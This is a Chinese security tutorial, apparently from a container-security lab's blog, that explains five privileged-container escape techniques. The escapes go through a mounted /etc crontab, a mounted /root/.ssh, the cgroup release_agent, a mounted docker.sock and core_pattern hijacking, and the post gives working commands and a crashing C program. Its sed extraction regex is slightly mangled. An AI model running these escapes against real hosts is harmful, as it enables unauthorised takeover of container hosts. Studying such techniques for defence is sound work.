五种方式教你用特权容器逃逸

前言

随着容器被广泛的使用，容器安全问题也越来越受重视，容器逃逸便是其中一项。容器逃逸可以理解为当攻击者通过某种手段获取到容器内权限后利用某些条件来创造条件，以获得容器所在宿主机的权限，也可以说是提权了。这次简单说几个个特权容器的逃逸手法。

正文

关于特权容器的逃逸相对来说比较容易一些，毕竟它自身已经被赋予了最大的权限。一般可能第一点想到的就是挂载主机的/etc目录来写定时任务或者是挂载/root/.ssh写ssh密钥。

因为/etc目录中包含crontab的配置文件，此文件目录为/etc/crontab。挂载了宿主机的/etc到容器内，在容器内修改crontab文件，宿主机上的crontab文件也同样会修改。话不多说，直接上图。

挂载了/root/.ssh目录到容器内，可以通过此方式逃逸。

• 生成本机的ssh私钥和公钥，命令：ssh-keygen -t rsa

• 把本机的公钥复制到容器内的/root/.ssh/authorized_keys里，可以实现宿主机的免密登陆。

将公钥复制至authorized_keys中

容器内直接使用私钥登陆宿主机，如图登陆成功

这两种方法简单粗暴，但是极容易被检测到，从而暴露。

首先启动一个容器

docker run --rm -it --privileged ubuntu bash

在容器里执行命令,将cgroup直接以 cgroup类型挂载到容器内，挂载选项为 rdma（远程直接内存访问）并在容器内创建一个子cgroup目录（cgroup_2）,目的是为了创建release_agent文件且触发release_agent执行的cgroup。

mkdir /tmp/cgroup
mount -t cgroup -o rdma cgroup /tmp/cgroup 
mkdir /tmp/cgroup/cgroup_2

激活子cgroup的notify_on_release，使得在子cgroup退出时能够执行其父cgroup中的release_agent,当将 notify_on_release被设置为1时，在子cgroup被移除时，内核将会运行顶层cgroup下的release_agent文件中指定的命令。

echo 1 > /tmp/cgroup/cgroup_2/notify_on_release

通过读取/etc/mtab获取uppdir= 后面跟随的路径（宿主机访问容器的路径）,并将其并写入 release_agent（如下图所示），宿主机可通过该路径访问容器根目录，cgroup最后一个程序退出时执行/cmd的脚本。

host_path=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgroup/release_agent

接下来就是构造cmd脚本，并将结果输出到容器内output下

echo '#!/bin/sh' > /cmd
echo "ps ef > $host_path/output" >> /cmd 
chmod a+x /cmd

通过子cgroup创建一个可以立即结束的进程，实施攻击,如图，成功获得主机ps结果

sh -c "echo $$ > /tmp/cgroup/cgroup_2/cgroup.procs"

当宿主机的docker.sock被挂载到容器内时，此容器可以通过docker.sock控制宿主机创建任意配置容器和控制正在运行的容器

 docker -H unix:///hack/docker.sock info  #通过此命令可以查看docker信息

docker -H unix:///hack/docker.sock run -it  --rm -v /:/test --name=docker_sock_taoyi2 centos  /bin/bash  #通过docker创建一个挂载宿主机根目录的容器

创建成功。

1、与cgroup相同，通过读取/etc/mtab获取uppdir= 后面跟随的路径。

sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab

2、此时容器内的 /exp.sh 对应宿主机/var/lib/docker/overlay2/5aad6c46857541101a54c64b8e92ac8495e4eecb6bbd6a76e24a0335be8d2d92/diff/exp.sh 文件。

3、挂载之后的文件，相当于共享。容器内外修改都会对应产生变化

echo -e "|/var/lib/docker/overlay2/5aad6c46857541101a54c64b8e92ac8495e4eecb6bbd6a76e24a0335be8d2d92/diff/exp.sh rcore " > /host_proc/sys/kernel/core_pattern

4、容器内触发segmentation fault

#include <stdio.h>

int main(void){
int *a = NULL;
*a = 1;
return 0;
}

5、执行

./a.out

总结

由于篇幅有限，此次只介绍了五种常见的特权容器逃逸思路。除此之外，特权容器或是容器逃逸的方式还有很多种，后续再一 一详述。

END

关于鲲鹏安全实验室

鲲鹏安全实验室专注于容器安全和业务灰黑产对抗的研究，收集和挖掘容器相关技术的安全漏洞，采集业务灰黑产情报，研究对抗手段。并将研究成功转换为产品和服务。

内容编辑：鲲鹏安全实验室 阳光照亮宇宙  责任编辑：剁肉工

往期推荐

云原生安全开源项目汇总

3种攻击手段教你拿下k8s集群

小佑科技入选Gartner《云原生应用保护平台创新洞察》代表厂商

本文始发于微信公众号（渗透攻击红队）：五种方式教你用特权容器逃逸